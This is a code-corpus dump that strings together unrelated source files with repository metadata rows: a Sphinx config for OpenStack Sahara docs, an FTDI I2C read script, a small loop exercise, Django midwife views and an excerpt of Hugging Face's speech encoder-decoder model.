# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# sahara documentation build configuration file, created Fri May 6 15:19:20
# 2016.
#
# This file is execfile()d with the current directory set to
# its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sys
extensions = [
'os_api_ref',
'openstackdocstheme'
]
# openstackdocstheme options
repository_name = 'openstack/sahara'
bug_project = '935'
bug_tag = 'api-ref'
html_last_updated_fmt = '%Y-%m-%d %H:%M'
html_theme = 'openstackdocs'
html_theme_options = {
"sidebar_dropdown": "api_ref",
"sidebar_mode": "toc",
}
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../../'))
sys.path.insert(0, os.path.abspath('../'))
sys.path.insert(0, os.path.abspath('./'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#
# source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Data Processing API Reference'
copyright = u'2010-present, OpenStack Foundation'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
from sahara.version import version_info
# The full version, including alpha/beta/rc tags.
release = version_info.release_string()
# The short X.Y version.
version = version_info.version_string()
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# The reST default role (used for this markup: `text`) to use
# for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = False
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for man page output ----------------------------------------------
# Grouping the document tree for man pages.
# List of tuples 'sourcefile', 'target', u'title', u'Authors name', 'manual'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ['_static']
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_use_modindex = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'saharaoc'
# -- Options for LaTeX output -------------------------------------------------
# The paper size ('letter' or 'a4').
# latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
# latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'Sahara.tex', u'OpenStack Data Processing API Documentation',
u'OpenStack Foundation', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# Additional stuff for the LaTeX preamble.
# latex_preamble = ''
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_use_modindex = True
| [
"Wayne [email protected]"
] | Wayne [email protected] |
210609fb82f3bd44f14c0dc789314dd099ea2a0f | 08c132bc63ebba2edebde139f7907953ae2fa04d | /Archived_Files/FTDI_Python_Libraries - SPI_MDIO_I2C/etc_i2c_flash.py | 5dc8f62ab699ff7816ef920fa89870c54f41af85 | [] | no_license | hudkmr/Code_Database | 12b60d1b331b91e9dc990d63bd4603bb92d0bfe7 | d80751c13bd30114af70d690ef8fc1a0d6368490 | refs/heads/master | 2021-01-21T12:49:47.564408 | 2015-07-30T02:28:07 | 2015-07-30T02:28:07 | 39,899,454 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 764 | py | #This Script Reads the Data from I2C Slave device(Flash memory) using FTDI MPSSE Engine
from etc_abb_i2c_lib import BB_I2C
from etc_abb_i2c_lib.etc_header import *
import sys
import time
d=BB_I2C(0)
d.DevConf(BAUD,DO_MASK_VAL,SYNC_MODE)
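# Configure the FTDI device: baud rate, data-output mask and synchronous
# bit-bang mode (constants imported from etc_header).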
TXACKBuf=[]
RXACKBuf=[]
d.I2CStart_CMD()
TXACKBuf+=d.SendAddr(0x80,0)
TXACKBuf+=d.SendByte('00')
d.I2CStart_CMD()
TXACKBuf+=d.SendAddr(0x80,1)
RXACKBuf+=d.ReadByteAK()
RXACKBuf+=d.ReadByteNAK()
d.I2CStop_CMD()
print RXACKBuf
'''
data = ['1','2','3','4','5','6','7','8']
TXACKBuf=[]
RXACKBuf=[]
d.I2CStart_CMD()
TXACKBuf+=d.SendAddr(0xA6,0)
TXACKBuf+=d.SendByte(0x10)
d.I2CStart_CMD()
TXACKBuf+=d.SendAddr(0xA6,1)
for i in range(7):
RXACKBuf+=d.ReadByteAK()
RXACKBuf+=d.ReadByteNAK()
d.I2CStop_CMD()
print RXACKBuf
'''
| [
"[email protected]"
] | |
110e68626a3a41241542e46200b9b2518c135ea3 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/59/usersdata/149/40381/submittedfiles/testes.py | ea7b0089a5a041e237f02731936156abd74a1461 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 93 | py | # -*- coding: utf-8 -*-
import math
i=int(input('enter i:'))
while i<10:
print(i)
i=i+1
| [
"[email protected]"
] | |
117aa18bc9ed57ce6572e9120224d114fc632a6e | 32e2e9ecd12d4eeaacc64d1a699672633501ea08 | /find_a_midwife/views.py | 142206c710eac207c0818e7371cb179f8e186912 | [] | no_license | BrianC68/wr_maternity | 365098abb13d255348d2d57bf1c543cd698e6ae8 | 5392fdead32c5f79c7be9a4cb0397df26a5de915 | refs/heads/master | 2023-01-24T08:42:06.965179 | 2023-01-20T17:42:44 | 2023-01-20T17:42:44 | 233,097,880 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | from django.shortcuts import render
from django.urls import reverse_lazy
from django.views.generic import ListView, DetailView
from .models import Midwife
class MidwifeListView(ListView):
'''Page that displays all midwives.'''
template_name = 'midwife_list_view.html'
model = Midwife
context_object_name = 'midwives'
def get_queryset(self):
queryset = super().get_queryset().only('name', 'service_area', 'photo')
return queryset
class MidwifeDetailView(DetailView):
'''Page that displays individual doula details.'''
template_name = 'midwife_detail_view.html'
model = Midwife
context_object_name = 'midwife'
| [
"[email protected]"
] | |
e3a979129f8e489822a61a1c0972a4cfd9305ecc | cad9d8b930fdd0998899c2ead23f7688769e0348 | /src/transformers/models/speech_encoder_decoder/modeling_speech_encoder_decoder.py | 45262ad940fe336ba84de724b25ee7e84f255647 | [
"Apache-2.0"
] | permissive | bage79/transformers | 2687ad7556e6dc10a7dc65d64c2696a837fce9ce | 867f3950fa908632ddb3564873293b620d73c2dc | refs/heads/main | 2022-06-13T08:20:33.887880 | 2022-03-25T13:12:23 | 2022-03-25T13:12:23 | 213,647,037 | 1 | 0 | Apache-2.0 | 2019-10-08T13:18:55 | 2019-10-08T13:18:54 | null | UTF-8 | Python | false | false | 32,331 | py | # coding=utf-8
# Copyright 2021 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Classes to support Speech-Encoder-Text-Decoder architectures"""
from typing import Optional
import torch
from torch import nn
from torch.nn import CrossEntropyLoss
from ...configuration_utils import PretrainedConfig
from ...modeling_outputs import Seq2SeqLMOutput
from ...modeling_utils import PreTrainedModel
from ...utils import add_start_docstrings, add_start_docstrings_to_model_forward, logging, replace_return_docstrings
from ..auto.configuration_auto import AutoConfig
from ..auto.modeling_auto import AutoModel, AutoModelForCausalLM
from .configuration_speech_encoder_decoder import SpeechEncoderDecoderConfig
logger = logging.get_logger(__name__)
_CONFIG_FOR_DOC = "SpeechEncoderDecoderConfig"
SPEECH_ENCODER_DECODER_START_DOCSTRING = r"""
This class can be used to initialize a speech-sequence-to-text-sequence model with any pretrained speech
autoencoding model as the encoder and any pretrained text autoregressive model as the decoder. The encoder is
loaded via [`~AutoModel.from_pretrained`] function and the decoder is loaded via
[`~AutoModelForCausalLM.from_pretrained`] function. Cross-attention layers are automatically added to the decoder
and should be fine-tuned on a downstream generative task, like summarization.
The effectiveness of initializing sequence-to-sequence models with pretrained checkpoints for sequence generation
tasks was shown in [Leveraging Pre-trained Checkpoints for Sequence Generation
Tasks](https://arxiv.org/abs/1907.12461) by Sascha Rothe, Shashi Narayan, Aliaksei Severyn. Michael Matena, Yanqi
Zhou, Wei Li, Peter J. Liu.
Additionally, in [Large-Scale Self- and Semi-Supervised Learning for Speech
Translation](https://arxiv.org/abs/2104.06678) it is shown how leveraging large pretrained speech models for speech
translation yields a significant performance improvement.
After such an Speech-Encoder Decoder model has been trained/fine-tuned, it can be saved/loaded just like any other
models (see the examples for more information).
This model inherits from [`PreTrainedModel`]. Check the superclass documentation for the generic methods the
library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads
etc.)
This model is also a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass.
Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage
and behavior.
Parameters:
config ([`SpeechEncoderDecoderConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
SPEECH_ENCODER_DECODER_INPUTS_DOCSTRING = r"""
Args:
inputs (`torch.FloatTensor` of shape `(batch_size, sequence_length)` or `(batch_size, sequence_length, feature_dim)`, *optional*):
Float values of input raw speech waveform or speech features. Values can be obtained by loading a *.flac*
or *.wav* audio file into an array of type *List[float]* or a *numpy.ndarray*, *e.g.* via the soundfile
library (*pip install soundfile*). To prepare the array into *inputs*, either the [`Wav2Vec2Processor`] or
[`Speech2TextProcessor`] should be used for padding and conversion into a tensor of type
*torch.FloatTensor*.
attention_mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*):
Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
[What are attention masks?](../glossary#attention-mask)
decoder_input_ids (`torch.LongTensor` of shape `(batch_size, target_sequence_length)`, *optional*):
Indices of decoder input sequence tokens in the vocabulary.
Indices can be obtained using [`PreTrainedTokenizer`]. See [`PreTrainedTokenizer.encode`] and
[`PreTrainedTokenizer.__call__`] for details.
[What are input IDs?](../glossary#input-ids)
If `past_key_values` is used, optionally only the last `decoder_input_ids` have to be input (see
`past_key_values`).
For training, `decoder_input_ids` are automatically created by the model by shifting the `labels` to the
right, replacing -100 by the `pad_token_id` and prepending them with the `decoder_start_token_id`.
decoder_attention_mask (`torch.BoolTensor` of shape `(batch_size, target_sequence_length)`, *optional*):
Default behavior: generate a tensor that ignores pad tokens in `decoder_input_ids`. Causal mask will also
be used by default.
encoder_outputs (`tuple(torch.FloatTensor)`, *optional*):
This tuple must consist of (`last_hidden_state`, *optional*: `hidden_states`, *optional*: `attentions`)
`last_hidden_state` (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`) is a tensor
of hidden-states at the output of the last layer of the encoder. Used in the cross-attention of the
decoder.
past_key_values (`tuple(tuple(torch.FloatTensor))` of length `config.n_layers` with each tuple having 4 tensors of shape `(batch_size, num_heads, sequence_length - 1, embed_size_per_head)`):
Contains precomputed key and value hidden states of the attention blocks. Can be used to speed up decoding.
If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those that
don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of all
`decoder_input_ids` of shape `(batch_size, sequence_length)`.
inputs_embeds (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This
is useful if you want more control over how to convert `input_ids` indices into associated vectors than the
model's internal embedding lookup matrix.
decoder_inputs_embeds (`torch.FloatTensor` of shape `(batch_size, target_sequence_length, hidden_size)`, *optional*):
Optionally, instead of passing `decoder_input_ids` you can choose to directly pass an embedded
representation. This is useful if you want more control over how to convert `decoder_input_ids` indices
into associated vectors than the model's internal embedding lookup matrix.
labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
Labels for computing the masked language modeling loss for the decoder. Indices should be in `[-100, 0,
..., config.vocab_size]` (see `input_ids` docstring) Tokens with indices set to `-100` are ignored
(masked), the loss is only computed for the tokens with labels in `[0, ..., config.vocab_size]`
use_cache (`bool`, *optional*):
If set to `True`, `past_key_values` key value states are returned and can be used to speed up decoding (see
`past_key_values`).
output_attentions (`bool`, *optional*):
Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
tensors for more detail.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
input_values (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*):
Float values of input raw speech waveform. Values can be obtained by loading a *.flac* or *.wav* audio file
into an array of type *List[float]* or a *numpy.ndarray*, *e.g.* via the soundfile library (*pip install
soundfile*). To prepare the array into *input_values*, the [`Wav2Vec2Processor`] should be used for padding
and conversion into a tensor of type *torch.FloatTensor*. See [`Wav2Vec2Processor.__call__`] for details.
input_features (`torch.LongTensor` of shape `(batch_size, sequence_length, feature_size)`, *optional*):
Float values of fbank features extracted from the raw speech waveform. Raw speech waveform can be obtained
by loading a `.flac` or `.wav` audio file into an array of type `List[float]` or a `numpy.ndarray`, *e.g.*
via the soundfile library (`pip install soundfile`). To prepare the array into `input_features`, the
[`Speech2TextTokenizer`] should be used for extracting the fbank features, padding and conversion into a
tensor of type `torch.FloatTensor`. See [`~Speech2TextTokenizer.__call__`]
return_dict (`bool`, *optional*):
If set to `True`, the model will return a [`~utils.Seq2SeqLMOutput`] instead of a plain tuple.
kwargs: (*optional*) Remaining dictionary of keyword arguments. Keyword arguments come in two flavors:
- Without a prefix which will be input as `**encoder_kwargs` for the encoder forward function.
- With a *decoder_* prefix which will be input as `**decoder_kwargs` for the decoder forward function.
"""
# Copied from transformers.models.encoder_decoder.modeling_encoder_decoder.shift_tokens_right
def shift_tokens_right(input_ids: torch.Tensor, pad_token_id: int, decoder_start_token_id: int):
"""
Shift input ids one token to the right.
"""
shifted_input_ids = input_ids.new_zeros(input_ids.shape)
shifted_input_ids[:, 1:] = input_ids[:, :-1].clone()
if decoder_start_token_id is None:
raise ValueError("Make sure to set the decoder_start_token_id attribute of the model's configuration.")
shifted_input_ids[:, 0] = decoder_start_token_id
if pad_token_id is None:
raise ValueError("Make sure to set the pad_token_id attribute of the model's configuration.")
# replace possible -100 values in labels by `pad_token_id`
shifted_input_ids.masked_fill_(shifted_input_ids == -100, pad_token_id)
return shifted_input_ids
@add_start_docstrings(SPEECH_ENCODER_DECODER_START_DOCSTRING)
class SpeechEncoderDecoderModel(PreTrainedModel):
r"""
[`SpeechEncoderDecoderModel`] is a generic model class that will be instantiated as a transformer architecture with
one of the base model classes of the library as encoder and another one as decoder when created with the
:meth*~transformers.AutoModel.from_pretrained* class method for the encoder and
:meth*~transformers.AutoModelForCausalLM.from_pretrained* class method for the decoder.
"""
config_class = SpeechEncoderDecoderConfig
base_model_prefix = "speech_encoder_decoder"
main_input_name = "inputs"
supports_gradient_checkpointing = True
def __init__(
self,
config: Optional[PretrainedConfig] = None,
encoder: Optional[PreTrainedModel] = None,
decoder: Optional[PreTrainedModel] = None,
):
if config is None and (encoder is None or decoder is None):
raise ValueError("Either a configuration or an encoder and a decoder has to be provided.")
if config is None:
config = SpeechEncoderDecoderConfig.from_encoder_decoder_configs(encoder.config, decoder.config)
else:
if not isinstance(config, self.config_class):
raise ValueError(f"Config: {config} has to be of type {self.config_class}")
if config.decoder.cross_attention_hidden_size is not None:
if config.decoder.cross_attention_hidden_size != config.encoder.hidden_size:
raise ValueError(
"If `cross_attention_hidden_size` is specified in the decoder's configuration, "
"it has to be equal to the encoder's `hidden_size`. "
f"Got {config.decoder.cross_attention_hidden_size} for `config.decoder.cross_attention_hidden_size` "
f"and {config.encoder.hidden_size} for `config.encoder.hidden_size`."
)
# initialize with config
# make sure input & output embeddings is not tied
config.tie_word_embeddings = False
super().__init__(config)
if encoder is None:
encoder = AutoModel.from_config(config.encoder)
if decoder is None:
decoder = AutoModelForCausalLM.from_config(config.decoder)
self.encoder = encoder
self.decoder = decoder
if self.encoder.config.to_dict() != self.config.encoder.to_dict():
logger.warning(
f"Config of the encoder: {self.encoder.__class__} is overwritten by shared encoder config: {self.config.encoder}"
)
if self.decoder.config.to_dict() != self.config.decoder.to_dict():
logger.warning(
f"Config of the decoder: {self.decoder.__class__} is overwritten by shared decoder config: {self.config.decoder}"
)
# make sure that the individual model's config refers to the shared config
# so that the updates to the config will be synced
self.encoder.config = self.config.encoder
self.decoder.config = self.config.decoder
# get encoder output hidden size
self.encoder_output_dim = getattr(config.encoder, "output_hidden_size", config.encoder.hidden_size)
if (
self.encoder_output_dim != self.decoder.config.hidden_size
and self.decoder.config.cross_attention_hidden_size is None
):
# encoder outputs might need to be projected to different dimension for decoder
self.enc_to_dec_proj = nn.Linear(self.encoder.config.hidden_size, self.decoder.config.hidden_size)
if self.encoder.get_output_embeddings() is not None:
raise ValueError(
f"The encoder {self.encoder} should not have a LM Head. Please use a model without LM Head"
)
def _set_gradient_checkpointing(self, module, value=False):
# call both encoder and decoder function on gradient checkpointing
self.encoder._set_gradient_checkpointing(module, value=value)
self.decoder._set_gradient_checkpointing(module, value=value)
def get_encoder(self):
return self.encoder
def get_decoder(self):
return self.decoder
def get_output_embeddings(self):
return self.decoder.get_output_embeddings()
def set_output_embeddings(self, new_embeddings):
return self.decoder.set_output_embeddings(new_embeddings)
def freeze_feature_encoder(self):
"""
Calling this function will disable the gradient computation for the feature encoder of the speech encoder so
that its parameters will not be updated during training.
"""
self.encoder.freeze_feature_encoder()
@classmethod
def from_pretrained(cls, *args, **kwargs):
# At the moment fast initialization is not supported for composite models
if kwargs.get("_fast_init", False):
logger.warning(
"Fast initialization is currently not supported for SpeechEncoderDecoderModel. "
"Falling back to slow initialization..."
)
kwargs["_fast_init"] = False
return super().from_pretrained(*args, **kwargs)
@classmethod
def from_encoder_decoder_pretrained(
cls,
encoder_pretrained_model_name_or_path: str = None,
decoder_pretrained_model_name_or_path: str = None,
*model_args,
**kwargs
) -> PreTrainedModel:
r"""
Instantiate an encoder and a decoder from one or two base classes of the library from pretrained model
checkpoints.
The model is set in evaluation mode by default using `model.eval()` (Dropout modules are deactivated). To train
the model, you need to first set it back in training mode with `model.train()`.
Params:
encoder_pretrained_model_name_or_path (`str`, *optional*):
Information necessary to initiate the encoder. Can be either:
- A string, the *model id* of a pretrained model hosted inside a model repo on huggingface.co.
Valid model ids can be located at the root-level, like `bert-base-uncased`, or namespaced under a
user or organization name, like `dbmdz/bert-base-german-cased`.
- A path to a *directory* containing model weights saved using
[`~PreTrainedModel.save_pretrained`], e.g., `./my_model_directory/`.
- A path or url to a *tensorflow index checkpoint file* (e.g, `./tf_model/model.ckpt.index`). In
this case, `from_tf` should be set to `True` and a configuration object should be provided as
`config` argument. This loading path is slower than converting the TensorFlow checkpoint in a
PyTorch model using the provided conversion scripts and loading the PyTorch model afterwards.
decoder_pretrained_model_name_or_path (`str`, *optional*, defaults to `None`):
Information necessary to initiate the decoder. Can be either:
- A string, the *model id* of a pretrained model hosted inside a model repo on huggingface.co.
Valid model ids can be located at the root-level, like `bert-base-uncased`, or namespaced under a
user or organization name, like `dbmdz/bert-base-german-cased`.
- A path to a *directory* containing model weights saved using
[`~PreTrainedModel.save_pretrained`], e.g., `./my_model_directory/`.
- A path or url to a *tensorflow index checkpoint file* (e.g, `./tf_model/model.ckpt.index`). In
this case, `from_tf` should be set to `True` and a configuration object should be provided as
`config` argument. This loading path is slower than converting the TensorFlow checkpoint in a
PyTorch model using the provided conversion scripts and loading the PyTorch model afterwards.
model_args (remaining positional arguments, *optional*):
All remaning positional arguments will be passed to the underlying model's `__init__` method.
kwargs (remaining dictionary of keyword arguments, *optional*):
Can be used to update the configuration object (after it being loaded) and initiate the model (e.g.,
`output_attentions=True`).
- To update the encoder configuration, use the prefix *encoder_* for each configuration parameter.
- To update the decoder configuration, use the prefix *decoder_* for each configuration parameter.
- To update the parent model configuration, do not use a prefix for each configuration parameter.
Behaves differently depending on whether a `config` is provided or automatically loaded.
Example:
```python
>>> from transformers import SpeechEncoderDecoderModel
>>> # initialize a wav2vec2bert from a pretrained Wav2Vec2 and a pretrained BERT model. Note that the cross-attention layers will be randomly initialized
>>> model = SpeechEncoderDecoderModel.from_encoder_decoder_pretrained(
... "facebook/wav2vec2-base-960h", "bert-base-uncased"
... )
>>> # saving model after fine-tuning
>>> model.save_pretrained("./wav2vec2bert")
>>> # load fine-tuned model
>>> model = SpeechEncoderDecoderModel.from_pretrained("./wav2vec2bert")
```"""
kwargs_encoder = {
argument[len("encoder_") :]: value for argument, value in kwargs.items() if argument.startswith("encoder_")
}
kwargs_decoder = {
argument[len("decoder_") :]: value for argument, value in kwargs.items() if argument.startswith("decoder_")
}
# remove encoder, decoder kwargs from kwargs
for key in kwargs_encoder.keys():
del kwargs["encoder_" + key]
for key in kwargs_decoder.keys():
del kwargs["decoder_" + key]
# Load and initialize the encoder and decoder
# The distinction between encoder and decoder at the model level is made
# by the value of the flag `is_decoder` that we need to set correctly.
encoder = kwargs_encoder.pop("model", None)
if encoder is None:
if encoder_pretrained_model_name_or_path is None:
raise ValueError(
"If `encoder_model` is not defined as an argument, a `encoder_pretrained_model_name_or_path` has "
"to be defined."
)
if "config" not in kwargs_encoder:
encoder_config, kwargs_encoder = AutoConfig.from_pretrained(
encoder_pretrained_model_name_or_path, **kwargs_encoder, return_unused_kwargs=True
)
if encoder_config.is_decoder is True or encoder_config.add_cross_attention is True:
logger.info(
f"Initializing {encoder_pretrained_model_name_or_path} as a encoder model "
"from a decoder model. Cross-attention and casual mask are disabled."
)
encoder_config.is_decoder = False
encoder_config.add_cross_attention = False
kwargs_encoder["config"] = encoder_config
encoder = AutoModel.from_pretrained(encoder_pretrained_model_name_or_path, *model_args, **kwargs_encoder)
decoder = kwargs_decoder.pop("model", None)
if decoder is None:
if decoder_pretrained_model_name_or_path is None:
raise ValueError(
"If `decoder_model` is not defined as an argument, a `decoder_pretrained_model_name_or_path` has "
"to be defined."
)
if "config" not in kwargs_decoder:
decoder_config, kwargs_decoder = AutoConfig.from_pretrained(
decoder_pretrained_model_name_or_path, **kwargs_decoder, return_unused_kwargs=True
)
if decoder_config.is_decoder is False or decoder_config.add_cross_attention is False:
logger.info(
f"Initializing {decoder_pretrained_model_name_or_path} as a decoder model. "
f"Cross attention layers are added to {decoder_pretrained_model_name_or_path} "
f"and randomly initialized if {decoder_pretrained_model_name_or_path}'s architecture allows for "
"cross attention layers."
)
decoder_config.is_decoder = True
decoder_config.add_cross_attention = True
kwargs_decoder["config"] = decoder_config
if kwargs_decoder["config"].is_decoder is False or kwargs_decoder["config"].add_cross_attention is False:
logger.warning(
f"Decoder model {decoder_pretrained_model_name_or_path} is not initialized as a decoder. "
f"In order to initialize {decoder_pretrained_model_name_or_path} as a decoder, "
"make sure that the attributes `is_decoder` and `add_cross_attention` of `decoder_config` "
"passed to `.from_encoder_decoder_pretrained(...)` are set to `True` or do not pass a "
"`decoder_config` to `.from_encoder_decoder_pretrained(...)`"
)
decoder = AutoModelForCausalLM.from_pretrained(decoder_pretrained_model_name_or_path, **kwargs_decoder)
# instantiate config with corresponding kwargs
config = SpeechEncoderDecoderConfig.from_encoder_decoder_configs(encoder.config, decoder.config, **kwargs)
# make sure input & output embeddings is not tied
config.tie_word_embeddings = False
return cls(encoder=encoder, decoder=decoder, config=config)
@add_start_docstrings_to_model_forward(SPEECH_ENCODER_DECODER_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=Seq2SeqLMOutput, config_class=_CONFIG_FOR_DOC)
def forward(
self,
inputs=None,
attention_mask=None,
decoder_input_ids=None,
decoder_attention_mask=None,
encoder_outputs=None,
past_key_values=None,
decoder_inputs_embeds=None,
labels=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
input_values=None,
input_features=None,
return_dict=None,
**kwargs,
):
r"""
Returns:
Examples:
```python
>>> from transformers import SpeechEncoderDecoderModel, Wav2Vec2Processor
>>> from datasets import load_dataset
>>> import torch
>>> processor = Wav2Vec2Processor.from_pretrained("facebook/wav2vec2-xls-r-300m-en-to-15")
>>> model = SpeechEncoderDecoderModel.from_pretrained("facebook/wav2vec2-xls-r-300m-en-to-15")
>>> ds = load_dataset("hf-internal-testing/librispeech_asr_dummy", "clean", split="validation")
>>> input_values = processor(ds[0]["audio"]["array"], return_tensors="pt").input_values
>>> # Inference: Translate English speech to German
>>> generated = model.generate(input_values)
>>> decoded = processor.batch_decode(generated, skip_special_tokens=True)[0]
>>> decoded
'Mr. Quilter ist der Apostel der Mittelschicht und wir freuen uns, sein Evangelium willkommen heißen zu können.'
>>> # Training: Train model on English transcription
>>> with processor.as_target_processor():
... labels = processor(ds[0]["text"], return_tensors="pt").input_ids
>>> loss = model(input_values, labels=labels).loss
>>> loss.backward()
```"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
kwargs_encoder = {argument: value for argument, value in kwargs.items() if not argument.startswith("decoder_")}
kwargs_decoder = {
argument[len("decoder_") :]: value for argument, value in kwargs.items() if argument.startswith("decoder_")
}
if encoder_outputs is None:
if inputs is None:
if input_values is not None and input_features is not None:
raise ValueError("You cannot specify both input_values and input_features at the same time")
elif input_values is not None:
inputs = input_values
elif input_features is not None:
inputs = input_features
else:
raise ValueError("You have to specify either input_values or input_features")
encoder_outputs = self.encoder(
inputs,
attention_mask=attention_mask,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
**kwargs_encoder,
)
encoder_hidden_states = encoder_outputs[0]
# optionally project encoder_hidden_states
if (
self.encoder_output_dim != self.decoder.config.hidden_size
and self.decoder.config.cross_attention_hidden_size is None
):
encoder_hidden_states = self.enc_to_dec_proj(encoder_hidden_states)
# compute correct encoder attention mask
if attention_mask is not None:
encoder_attention_mask = self.encoder._get_feature_vector_attention_mask(
encoder_hidden_states.shape[1], attention_mask
)
else:
encoder_attention_mask = None
if (labels is not None) and (decoder_input_ids is None and decoder_inputs_embeds is None):
decoder_input_ids = shift_tokens_right(
labels, self.config.pad_token_id, self.config.decoder_start_token_id
)
# Decode
decoder_outputs = self.decoder(
input_ids=decoder_input_ids,
attention_mask=decoder_attention_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
inputs_embeds=decoder_inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
use_cache=use_cache,
past_key_values=past_key_values,
return_dict=return_dict,
**kwargs_decoder,
)
# Compute loss independent from decoder (as some shift the logits inside them)
loss = None
if labels is not None:
logits = decoder_outputs.logits if return_dict else decoder_outputs[0]
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.reshape(-1, self.decoder.config.vocab_size), labels.view(-1))
if not return_dict:
if loss is not None:
return (loss,) + decoder_outputs + encoder_outputs
else:
return decoder_outputs + encoder_outputs
return Seq2SeqLMOutput(
loss=loss,
logits=decoder_outputs.logits,
past_key_values=decoder_outputs.past_key_values,
decoder_hidden_states=decoder_outputs.hidden_states,
decoder_attentions=decoder_outputs.attentions,
cross_attentions=decoder_outputs.cross_attentions,
